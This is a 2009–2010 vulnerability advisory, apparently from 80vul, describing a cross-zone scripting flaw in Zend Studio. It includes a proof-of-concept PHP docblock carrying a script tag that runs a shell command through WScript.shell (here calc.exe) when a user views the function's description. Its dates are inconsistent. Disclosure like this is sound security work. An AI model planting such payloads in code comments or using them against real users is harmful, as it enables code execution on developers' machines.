`Author: www.80vul.com [Email: [email protected]]
Release Date: 2010/7/10
References:
http://80vul.com/Zend%20studio/Zend%20studio%20location%20Cross.htm
Zend Studio is a commercial, proprietary integrated development environment
(IDE) for PHP developed by Zend Technologies, based on the PHP Development
Tools (PDT) plugin for the Eclipse platform (the PDT project is led by
Zend).
We found a security bug of it in Zend studio [version >6.0], the description
of a function of php script does'nt be escaped or htmlencode, so it lead to
can be exploited to execute arbitrary HTML and script code what the attacker
inject evil codz on functions description.
And this vul is a Cross-Zone Scripting vul, so Successful exploitation
allows execution of arbitrary code in users system.
DEMO:
<?php
/**
* <script>new
ActiveXObject("WScript.shell").Run('calc.exe',1,true);</script>");
*/
function a() {
}
Then Open the function a()s description [type a word "a" or move your mouse
on it] ,the calc.exe well be run.
Disclosure Timeline:
2009/07/08 - Found this Vulnerability
2009/07/10 - Public Disclosure
--
hitest
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation